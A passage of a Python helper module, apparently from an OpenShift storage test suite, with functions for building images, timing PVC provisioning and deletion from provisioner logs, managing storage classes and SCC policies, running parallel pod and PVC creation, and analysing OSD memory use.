pod_objs.append(pod_obj)
return pod_objs
def create_build_from_docker_image(
image_name,
install_package,
namespace,
source_image='centos',
source_image_label='latest'
):
"""
Allows to create a build config using a Dockerfile specified as an argument
For eg., oc new-build -D $'FROM centos:7\nRUN yum install -y httpd',
creates a build with 'httpd' installed
Args:
image_name (str): Name of the image to be created
source_image (str): Source image to build docker image from,
Defaults to Centos as base image
namespace (str): project where build config should be created
source_image_label (str): Tag to use along with the image name,
Defaults to 'latest'
install_package (str): package to install over the base image
Returns:
OCP (obj): Returns the OCP object for the image
Fails on UnavailableBuildException exception if build creation
fails
"""
base_image = source_image + ':' + source_image_label
if config.DEPLOYMENT.get('disconnected'):
base_image = mirror_image(image=base_image)
cmd = f'yum install -y {install_package}'
http_proxy, https_proxy, no_proxy = get_cluster_proxies()
if http_proxy:
cmd = (
f"http_proxy={http_proxy} https_proxy={https_proxy} "
f"no_proxy='{no_proxy}' {cmd}"
)
docker_file = (
f"FROM {base_image}\n "
f" RUN {cmd}\n"
f"CMD tail -f /dev/null"
)
command = f"new-build -D $\'{docker_file}\' --name={image_name}"
kubeconfig = os.getenv('KUBECONFIG')
oc_cmd = f"oc -n {namespace} "
if kubeconfig:
oc_cmd += f"--kubeconfig {kubeconfig} "
oc_cmd += command
logger.info(f'Running command {oc_cmd}')
result = run(
oc_cmd,
stdout=PIPE,
stderr=PIPE,
timeout=15,
shell=True
)
if result.stderr.decode():
raise UnavailableBuildException(
f'Build creation failed with error: {result.stderr.decode()}'
)
out = result.stdout.decode()
logger.info(out)
if 'Success' in out:
# Build becomes ready once build pod goes into Completed state
pod_obj = OCP(kind='Pod', resource_name=image_name)
if pod_obj.wait_for_resource(
condition='Completed',
resource_name=f'{image_name}' + '-1-build',
timeout=300,
sleep=30
):
logger.info(f'build {image_name} ready')
set_image_lookup(image_name)
logger.info(f'image {image_name} can now be consumed')
image_stream_obj = OCP(
kind='ImageStream', resource_name=image_name
)
return image_stream_obj
else:
raise UnavailableBuildException('Build creation failed')
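# Illustrative sketch (assumed package and namespace): build a centos-based image
# with fio installed and get back its ImageStream object.
#
#   image_stream = create_build_from_docker_image(
#       image_name='fio-image', install_package='fio', namespace='my-test-project'
#   )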
def set_image_lookup(image_name):
"""
Function to enable lookup, which allows reference to the image stream tag
in the image field of the object. Example,
$ oc set image-lookup mysql
$ oc run mysql --image=mysql
Args:
image_name (str): Name of the image stream to pull
the image locally
Returns:
str: output of set image-lookup command
"""
ocp_obj = ocp.OCP(kind='ImageStream')
command = f'set image-lookup {image_name}'
logger.info(f'image lookup for image"{image_name}" is set')
status = ocp_obj.exec_oc_cmd(command)
return status
def get_worker_nodes():
"""
Fetches all worker nodes.
Returns:
list: List of names of worker nodes
"""
label = 'node-role.kubernetes.io/worker'
ocp_node_obj = ocp.OCP(kind=constants.NODE)
nodes = ocp_node_obj.get(selector=label).get('items')
worker_nodes_list = [node.get('metadata').get('name') for node in nodes]
return worker_nodes_list
def get_master_nodes():
"""
Fetches all master nodes.
Returns:
list: List of names of master nodes
"""
label = 'node-role.kubernetes.io/master'
ocp_node_obj = ocp.OCP(kind=constants.NODE)
nodes = ocp_node_obj.get(selector=label).get('items')
master_nodes_list = [node.get('metadata').get('name') for node in nodes]
return master_nodes_list
def get_provision_time(interface, pvc_name, status='start'):
"""
Get the starting/ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str / list): Name of the PVC for creation time measurement,
or a list of PVC objects
status (str): the status that we want to get - 'start' / 'end'
Returns:
datetime object: Time of PVC(s) creation
"""
# Define the status that need to retrieve
operation = 'started'
if status.lower() == 'end':
operation = 'succeeded'
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the time for the one PVC provisioning
if isinstance(pvc_name, str):
stat = [
i for i in logs if re.search(f"provision.*{pvc_name}.*{operation}", i)
]
stat = stat[0].split(' ')[1]
# Extract the time for the list of PVCs provisioning
if isinstance(pvc_name, list):
all_stats = []
for pv_name in pvc_name:
name = pv_name.name
stat = [
i for i in logs if re.search(f"provision.*{name}.*{operation}", i)
]
stat = stat[0].split(' ')[1]
all_stats.append(stat)
all_stats = sorted(all_stats)
if status.lower() == 'end':
stat = all_stats[-1] # return the highest time
elif status.lower() == 'start':
stat = all_stats[0] # return the lowest time
return datetime.datetime.strptime(stat, format)
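# Illustrative sketch: measure how long a single PVC took to provision, using the
# start/end log entries parsed above (pvc_obj is assumed to be an existing PVC object).
#
#   start = get_provision_time(constants.CEPHBLOCKPOOL, pvc_obj.name, status='start')
#   end = get_provision_time(constants.CEPHBLOCKPOOL, pvc_obj.name, status='end')
#   logger.info(f"PVC provisioning took {(end - start).total_seconds()} seconds")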
def get_start_creation_time(interface, pvc_name):
"""
Get the starting creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: Start time of PVC creation
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
start = [
i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)
]
start = start[0].split(' ')[1]
return datetime.datetime.strptime(start, format)
def get_end_creation_time(interface, pvc_name):
"""
Get the ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: End time of PVC creation
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the end time for the PVC provisioning
end = [
i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)
]
end = end[0].split(' ')[1]
return datetime.datetime.strptime(end, format)
def measure_pvc_creation_time(interface, pvc_name):
"""
Measure PVC creation time based on logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
float: Creation time for the PVC
"""
start = get_start_creation_time(interface=interface, pvc_name=pvc_name)
end = get_end_creation_time(interface=interface, pvc_name=pvc_name)
total = end - start
return total.total_seconds()
def measure_pvc_creation_time_bulk(interface, pvc_name_list, wait_time=60):
"""
Measure PVC creation time of bulk PVC based on logs.
Args:
interface (str): The interface backed the PVC
pvc_name_list (list): List of PVC Names for measuring creation time
wait_time (int): Seconds to wait before collecting CSI log
Returns:
pvc_dict (dict): Dictionary of pvc_name with creation time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# due to some delay in CSI log generation added wait
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
pvc_dict = dict()
format = '%H:%M:%S.%f'
for pvc_name in pvc_name_list:
# Extract the starting time for the PVC provisioning
start = [
i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)
]
start = start[0].split(' ')[1]
start_time = datetime.datetime.strptime(start, format)
# Extract the end time for the PVC provisioning
end = [
i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)
]
end = end[0].split(' ')[1]
end_time = datetime.datetime.strptime(end, format)
total = end_time - start_time
pvc_dict[pvc_name] = total.total_seconds()
return pvc_dict
def measure_pv_deletion_time_bulk(interface, pv_name_list, wait_time=60):
"""
Measure PV deletion time of bulk PV, based on logs.
Args:
interface (str): The interface backed the PV
pv_name_list (list): List of PV Names for measuring deletion time
wait_time (int): Seconds to wait before collecting CSI log
Returns:
pv_dict (dict): Dictionary of pv_name with deletion time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# due to some delay in CSI log generation added wait
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
pv_dict = dict()
format = '%H:%M:%S.%f'
for pv_name in pv_name_list:
# Extract the deletion start time for the PV
start = [
i for i in logs if re.search(f"delete \"{pv_name}\": started", i)
]
start = start[0].split(' ')[1]
start_time = datetime.datetime.strptime(start, format)
# Extract the deletion end time for the PV
end = [
i for i in logs if re.search(f"delete \"{pv_name}\": succeeded", i)
]
end = end[0].split(' ')[1]
end_time = datetime.datetime.strptime(end, format)
total = end_time - start_time
pv_dict[pv_name] = total.total_seconds()
return pv_dict
def get_start_deletion_time(interface, pv_name):
"""
Get the starting deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PV for deletion time measurement
Returns:
datetime object: Start time of PVC deletion
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PVC deletion
start = [
i for i in logs if re.search(f"delete \"{pv_name}\": started", i)
]
start = start[0].split(' ')[1]
return datetime.datetime.strptime(start, format)
def get_end_deletion_time(interface, pv_name):
"""
Get the ending deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PVC for deletion time measurement
Returns:
datetime object: End time of PVC deletion
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the end time for the PV deletion
end = [
i for i in logs if re.search(f"delete \"{pv_name}\": succeeded", i)
]
end = end[0].split(' ')[1]
return datetime.datetime.strptime(end, format)
def measure_pvc_deletion_time(interface, pv_name):
"""
Measure PVC deletion time based on logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PV for deletion time measurement
Returns:
float: Deletion time for the PVC
"""
start = get_start_deletion_time(interface=interface, pv_name=pv_name)
end = get_end_deletion_time(interface=interface, pv_name=pv_name)
total = end - start
return total.total_seconds()
def pod_start_time(pod_obj):
"""
Function to measure time taken for container(s) to get into running state
by measuring the difference between container's start time (when container
went into running state) and started time (when container was actually
started)
Args:
pod_obj(obj): pod object to measure start time
Returns:
containers_start_time(dict):
Returns the name and start time of container(s) in a pod
"""
time_format = '%Y-%m-%dT%H:%M:%SZ'
containers_start_time = {}
start_time = pod_obj.data['status']['startTime']
start_time = datetime.datetime.strptime(start_time, time_format)
for container in range(len(pod_obj.data['status']['containerStatuses'])):
started_time = pod_obj.data[
'status']['containerStatuses'][container]['state'][
'running']['startedAt']
started_time = datetime.datetime.strptime(started_time, time_format)
container_name = pod_obj.data[
'status']['containerStatuses'][container]['name']
container_start_time = (started_time - start_time).seconds
containers_start_time[container_name] = container_start_time
return containers_start_time
def get_default_storage_class():
"""
Get the default StorageClass(es)
Returns:
list: default StorageClass(es) list
"""
default_sc_obj = ocp.OCP(kind='StorageClass')
storage_classes = default_sc_obj.get().get('items')
storage_classes = [
sc for sc in storage_classes if 'annotations' in sc.get('metadata')
]
return [
sc.get('metadata').get('name') for sc in storage_classes if sc.get(
'metadata'
).get('annotations').get(
'storageclass.kubernetes.io/is-default-class'
) == 'true'
]
def change_default_storageclass(scname):
"""
Change the default StorageClass to the given SC name
Args:
scname (str): StorageClass name
Returns:
bool: True on success
"""
default_sc = get_default_storage_class()
ocp_obj = ocp.OCP(kind='StorageClass')
if default_sc:
# Change the existing default Storageclass annotation to false
patch = " '{\"metadata\": {\"annotations\":" \
"{\"storageclass.kubernetes.io/is-default-class\"" \
":\"false\"}}}' "
patch_cmd = f"patch storageclass {default_sc} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
# Change the new storageclass to default
patch = " '{\"metadata\": {\"annotations\":" \
"{\"storageclass.kubernetes.io/is-default-class\"" \
":\"true\"}}}' "
patch_cmd = f"patch storageclass {scname} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
return True
def is_volume_present_in_backend(interface, image_uuid, pool_name=None):
"""
Check whether Image/Subvolume is present in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents
corresponding image/subvolume in backend
eg: oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'
Output is the CSI generated VolID and looks like:
'0001-000c-rook-cluster-0000000000000001-
f301898c-a192-11e9-852a-1eeeb6975c91' where
image_uuid is 'f301898c-a192-11e9-852a-1eeeb6975c91'
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
Returns:
bool: True if volume is present and False if volume is not present
"""
ct_pod = pod.get_ceph_tools_pod()
if interface == constants.CEPHBLOCKPOOL:
valid_error = [f"error opening image csi-vol-{image_uuid}"]
cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
if interface == constants.CEPHFILESYSTEM:
valid_error = [
f"Subvolume 'csi-vol-{image_uuid}' not found",
f"subvolume 'csi-vol-{image_uuid}' does not exist"
]
cmd = (
f"ceph fs subvolume getpath {get_cephfs_name()}"
f" csi-vol-{image_uuid} csi"
)
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format='json')
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} exists "
f"in backend"
)
return True
except CommandFailed as ecf:
assert any([error in str(ecf) for error in valid_error]), (
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
)
logger.info(
f"Volume corresponding to uuid {image_uuid} does not exist "
f"in backend"
)
return False
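# Illustrative sketch: deriving image_uuid from a PV's CSI volumeHandle as described
# in the docstring above (the slicing assumes the handle layout shown there and the
# usual 'items' layout of the PV listing).
#
#   vol_handle = get_all_pvs()['items'][0]['spec']['csi']['volumeHandle']
#   image_uuid = '-'.join(vol_handle.split('-')[-5:])
#   is_volume_present_in_backend(
#       constants.CEPHBLOCKPOOL, image_uuid, pool_name=default_ceph_block_pool()
#   )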
def verify_volume_deleted_in_backend(
interface, image_uuid, pool_name=None, timeout=180
):
"""
Ensure that Image/Subvolume is deleted in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents
corresponding image/subvolume in backend
eg: oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'
Output is the CSI generated VolID and looks like:
'0001-000c-rook-cluster-0000000000000001-
f301898c-a192-11e9-852a-1eeeb6975c91' where
image_uuid is 'f301898c-a192-11e9-852a-1eeeb6975c91'
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
timeout (int): Wait time for the volume to be deleted.
Returns:
bool: True if volume is deleted before timeout.
False if volume is not deleted.
"""
try:
for ret in TimeoutSampler(
timeout, 2, is_volume_present_in_backend, interface=interface,
image_uuid=image_uuid, pool_name=pool_name
):
if not ret:
break
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
f"in backend"
)
return True
except TimeoutExpiredError:
logger.error(
f"Volume corresponding to uuid {image_uuid} is not deleted "
f"in backend"
)
# Log 'ceph progress' and 'ceph rbd task list' for debugging purpose
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd('ceph progress json', format=None)
ct_pod.exec_ceph_cmd('ceph rbd task list')
return False
def create_serviceaccount(namespace):
"""
Create a Serviceaccount
Args:
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
service_account_data = templating.load_yaml(
constants.SERVICE_ACCOUNT_YAML
)
service_account_data['metadata']['name'] = create_unique_resource_name(
'sa', 'serviceaccount'
)
service_account_data['metadata']['namespace'] = namespace
return create_resource(**service_account_data)
def get_serviceaccount_obj(sa_name, namespace):
"""
Get serviceaccount obj
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
ocp_sa_obj = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
try:
sa_dict = ocp_sa_obj.get(resource_name=sa_name)
return OCS(**sa_dict)
except CommandFailed:
logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace):
"""
Validate serviceaccount is added to scc of privileged
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
bool: True if sc_name is present in scc of privileged else False
"""
sa_name = f"system:serviceaccount:{namespace}:{sa_name}"
logger.info(sa_name)
ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
scc_dict = ocp_scc_obj.get(resource_name=constants.PRIVILEGED)
scc_users_list = scc_dict.get('users')
for scc_user in scc_users_list:
if scc_user == sa_name:
return True
return False
def add_scc_policy(sa_name, namespace):
"""
Adding ServiceAccount to scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy creation
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy add-scc-to-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False
)
logger.info(out)
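# Illustrative sketch (assumed namespace): grant a test ServiceAccount the
# privileged SCC and confirm it was added.
#
#   sa_obj = create_serviceaccount(namespace='my-test-project')
#   add_scc_policy(sa_name=sa_obj.name, namespace='my-test-project')
#   assert validate_scc_policy(sa_obj.name, 'my-test-project')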
def remove_scc_policy(sa_name, namespace):
"""
Removing ServiceAccount from scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy deletion
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy remove-scc-from-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False
)
logger.info(out)
def craft_s3_command(cmd, mcg_obj=None, api=False):
"""
Crafts the AWS CLI S3 command including the
login credentials and the command to be run
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI command to run
api: True if the call is for s3api, false if s3
Returns:
str: The crafted command, ready to be executed on the pod
"""
api = 'api' if api else ''
if mcg_obj:
base_command = (
f'sh -c "AWS_CA_BUNDLE={constants.SERVICE_CA_CRT_AWSCLI_PATH} '
f'AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} '
f'AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} '
f'AWS_DEFAULT_REGION={mcg_obj.region} '
f'aws s3{api} '
f'--endpoint={mcg_obj.s3_internal_endpoint} '
)
string_wrapper = '"'
else:
base_command = (
f"aws s3{api} --no-sign-request "
)
string_wrapper = ''
return f"{base_command}{cmd}{string_wrapper}"
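# Illustrative sketch (assumed bucket name): craft a listing command; the result is
# meant to be executed inside an awscli pod, and mcg_obj is assumed to hold valid
# MCG S3 credentials.
#
#   cmd = craft_s3_command('ls s3://my-bucket', mcg_obj=mcg_obj)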
def wait_for_resource_count_change(
func_to_use, previous_num, namespace, change_type='increase',
min_difference=1, timeout=20, interval=2, **func_kwargs
):
"""
Wait for a change in total count of PVC or pod
Args:
func_to_use (function): Function to be used to fetch resource info
Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
previous_num (int): Previous number of pods/PVCs for comparison
namespace (str): Name of the namespace
change_type (str): Type of change to check. Accepted values are
'increase' and 'decrease'. Default is 'increase'.
min_difference (int): Minimum required difference in PVC/pod count
timeout (int): Maximum wait time in seconds
interval (int): Time in seconds to wait between consecutive checks
Returns:
True if difference in count is greater than or equal to
'min_difference'. False in case of timeout.
"""
try:
for sample in TimeoutSampler(
timeout, interval, func_to_use, namespace, **func_kwargs
):
if func_to_use == pod.get_all_pods:
current_num = len(sample)
else:
current_num = len(sample['items'])
if change_type == 'increase':
count_diff = current_num - previous_num
else:
count_diff = previous_num - current_num
if count_diff >= min_difference:
return True
except TimeoutExpiredError:
return False
def verify_pv_mounted_on_node(node_pv_dict):
"""
Check if mount point of a PV exists on a node
Args:
node_pv_dict (dict): Node to PV list mapping
eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}
Returns:
dict: Node to existing PV list mapping
eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}
"""
existing_pvs = {}
for node_name, pvs in node_pv_dict.items():
cmd = f'oc debug nodes/{node_name} -- df'
df_on_node = run_cmd(cmd)
existing_pvs[node_name] = []
for pv_name in pvs:
if f"/pv/{pv_name}/" in df_on_node:
existing_pvs[node_name].append(pv_name)
return existing_pvs
def converge_lists(list_to_converge):
"""
Function to flatten a list of lists (e.g. the sublists created when gathering future objects)
Args:
list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]
Returns:
list (list): return converged list eg: [1,2,3,4]
"""
return [item for sublist in list_to_converge for item in sublist]
def create_multiple_pvc_parallel(
sc_obj, namespace, number_of_pvc, size, access_modes
):
"""
Function to create multiple PVCs in parallel using threads
Function will create PVCs based on the available access modes
Args:
sc_obj (str): Storage Class object
namespace (str): The namespace for creating pvc
number_of_pvc (int): Number of PVCs to be created
size (str): size of the pvc eg: '10Gi'
access_modes (list): List of access modes for PVC creation
Returns:
pvc_objs_list (list): List of pvc objs created in function
"""
obj_status_list, result_lists = ([] for i in range(2))
with ThreadPoolExecutor() as executor:
for mode in access_modes:
result_lists.append(
executor.submit(
create_multiple_pvcs, sc_name=sc_obj.name,
namespace=namespace, number_of_pvc=number_of_pvc,
access_mode=mode, size=size)
)
result_list = [result.result() for result in result_lists]
pvc_objs_list = converge_lists(result_list)
# Check for all the pvcs in Bound state
with ThreadPoolExecutor() as executor:
for objs in pvc_objs_list:
obj_status_list.append(
executor.submit(wait_for_resource_state, objs, 'Bound', 90)
)
if False in [obj.result() for obj in obj_status_list]:
raise TimeoutExpiredError
return pvc_objs_list
def create_pods_parallel(
pvc_list, namespace, interface, pod_dict_path=None, sa_name=None, raw_block_pv=False,
dc_deployment=False, node_selector=None
):
"""
Function to create pods in parallel
Args:
pvc_list (list): List of pvcs to be attached in pods
namespace (str): The namespace for creating pod
interface (str): The interface backed the PVC
pod_dict_path (str): pod_dict_path for yaml
sa_name (str): sa_name for providing permission
raw_block_pv (bool): True if the PVCs are raw block, False otherwise
dc_deployment (bool): True to create the pods as DeploymentConfigs, False otherwise
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
Returns:
pod_objs (list): Returns list of pods created
"""
future_pod_objs = []
# Use a 300 sec wait time since in scale tests, once the setup has more
# pods, the time taken for a pod to come up depends on the resources available
wait_time = 300
if raw_block_pv and not pod_dict_path:
pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
with ThreadPoolExecutor() as executor:
for pvc_obj in pvc_list:
future_pod_objs.append(executor.submit(
create_pod, interface_type=interface,
pvc_name=pvc_obj.name, do_reload=False, namespace=namespace,
raw_block_pv=raw_block_pv, pod_dict_path=pod_dict_path,
sa_name=sa_name, dc_deployment=dc_deployment, node_selector=node_selector
))
pod_objs = [pvc_obj.result() for pvc_obj in future_pod_objs]
# Check that all the pods are in Running state
# (the pod creation above does not wait for the pods because threads are used)
with ThreadPoolExecutor() as executor:
for obj in pod_objs:
future_pod_objs.append(
executor.submit(wait_for_resource_state, obj, 'Running', timeout=wait_time)
)
# If pods not up raise exception/failure
if False in [obj.result() for obj in future_pod_objs]:
raise TimeoutExpiredError
return pod_objs
def delete_objs_parallel(obj_list):
"""
Function to delete objs specified in list
Args:
obj_list(list): List can be obj of pod, pvc, etc
Returns:
bool: True if obj deleted else False
"""
threads = list()
for obj in obj_list:
process = threading.Thread(target=obj.delete)
process.start()
threads.append(process)
for process in threads:
process.join()
return True
def memory_leak_analysis(median_dict):
"""
Function to analyse a memory leak after execution of a test case.
Memory leak is analyzed based on the top output "RES" value of the ceph-osd daemon,
i.e. list[7] in code
Args:
median_dict (dict): dict of worker nodes and respective median value
eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}
More Detail on Median value:
Calculating a memory leak requires a baseline value, which should not be
taken at the start or end of the test, so it is calculated by sampling memory
for 180 sec before TC execution and taking the median of it.
The memory value can differ between nodes, so a baseline value is identified
for each node and stored in median_dict
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
# dict to store memory leak difference for each worker
diff = {}
for worker in get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
number_of_lines = len(memory_leak_data) - 1
        # Get the start value from the median_dict arg for the respective worker
start_value = median_dict[f"{worker}"]
end_value = memory_leak_data[number_of_lines]
logging.info(f"Median value {start_value}")
logging.info(f"End value {end_value}")
# Convert the values to kb for calculations
        if 'g' in start_value:
            start_value = float(1024 ** 2 * float(start_value[:-1]))
        elif 'm' in start_value:
            start_value = float(1024 * float(start_value[:-1]))
        else:
            start_value = float(start_value)
        if 'g' in end_value:
            end_value = float(1024 ** 2 * float(end_value[:-1]))
        elif 'm' in end_value:
            end_value = float(1024 * float(end_value[:-1]))
        else:
            end_value = float(end_value)
# Calculate the percentage of diff between start and end value
# Based on value decide TC pass or fail
diff[worker] = ((end_value - start_value) / start_value) * 100
logging.info(f"Percentage diff in start and end value {diff[worker]}")
if diff[worker] <= 20:
logging.info(f"No memory leak in worker {worker} passing the test")
else:
logging.info(f"There is a memory leak in worker {worker}")
logging.info(f"Memory median value start of the test {start_value}")
logging.info(f"Memory value end of the test {end_value}")
raise UnexpectedBehaviour
def get_memory_leak_median_value():
"""
    Function to calculate the memory leak median value by collecting data for 180 sec
    and taking the median, which is used as the starting point for evaluating
    the memory leak based on the "RES" value of the ceph-osd daemon (field index 7)
Returns:
median_dict (dict): dict of worker nodes and respective median value
"""
median_dict = {}
timeout = 180 # wait for 180 sec to evaluate memory leak median data.
logger.info(f"waiting for {timeout} sec to evaluate the median value")
time.sleep(timeout)
for worker in get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
median_dict[f"{worker}"] = statistics.median(memory_leak_data)
return median_dict
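# Illustrative helper (not part of the original module): the RES-column parsing is
# duplicated in memory_leak_analysis() and get_memory_leak_median_value() above; a
# shared version of that parsing could look like the sketch below.
def _parse_res_from_top_line(line):
    """Return the RES column (field index 7) from one line of saved top output."""
    fields = [field for field in line.split(" ") if field]
    return fields[7]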
def refresh_oc_login_connection(user=None, password=None):
"""
Function to refresh oc user login
Default login using kubeadmin user and password
Args:
user (str): Username to login
password (str): Password to login
"""
user = user or config.RUN['username']
if not password:
filename = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['password_location']
)
with open(filename) as f:
password = f.read()
ocs_obj = ocp.OCP()
ocs_obj.login(user=user, password=password)
def rsync_kubeconf_to_node(node):
"""
Function to copy kubeconfig to OCP node
Args:
node (str): OCP node to copy kubeconfig if not present
"""
# ocp_obj = ocp.OCP()
filename = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['kubeconfig_location']
)
file_path = os.path.dirname(filename)
master_list = get_master_nodes()
ocp_obj = ocp.OCP()
check_auth = 'auth'
check_conf = 'kubeconfig'
node_path = '/home/core/'
if check_auth not in ocp_obj.exec_oc_debug_cmd(node=master_list[0], cmd_list=[f"ls {node_path}"]):
ocp.rsync(
src=file_path, dst=f"{node_path}", node=node, dst_node=True
)
elif check_conf not in ocp_obj.exec_oc_debug_cmd(node=master_list[0], cmd_list=[f"ls {node_path}auth"]):
ocp.rsync(
src=file_path, dst=f"{node_path}", node=node, dst_node=True
)
def create_dummy_osd(deployment):
"""
Replace one of OSD pods with pod that contains all data from original
OSD but doesn't run osd daemon. This can be used e.g. for direct acccess
to Ceph Placement Groups.
Args:
deployment (str): Name of deployment to use
Returns:
list: first item is dummy deployment object, second item is dummy pod
object
"""
oc = OCP(
kind=constants.DEPLOYMENT,
namespace=config.ENV_DATA.get('cluster_namespace')
)
osd_data = oc.get(deployment)
dummy_deployment = create_unique_resource_name('dummy', 'osd')
osd_data['metadata']['name'] = dummy_deployment
osd_containers = osd_data.get('spec').get('template').get('spec').get(
'containers'
)
# get osd container spec
original_osd_args = osd_containers[0].get('args')
osd_data['spec']['template']['spec']['containers'][0]['args'] = []
osd_data['spec']['template']['spec']['containers'][0]['command'] = [
'/bin/bash',
'-c',
'sleep infinity'
]
osd_file = tempfile.NamedTemporaryFile(
mode='w+', prefix=dummy_deployment, delete=False
)
with open(osd_file.name, "w") as temp:
yaml.dump(osd_data, temp)
oc.create(osd_file.name)
# downscale the original deployment and start dummy deployment instead
oc.exec_oc_cmd(f"scale --replicas=0 deployment/{deployment}")
oc.exec_oc_cmd(f"scale --replicas=1 deployment/{dummy_deployment}")
osd_list = pod.get_osd_pods()
    dummy_pod = [osd_pod for osd_pod in osd_list if dummy_deployment in osd_pod.name][0]
wait_for_resource_state(
resource=dummy_pod,
state=constants.STATUS_RUNNING,
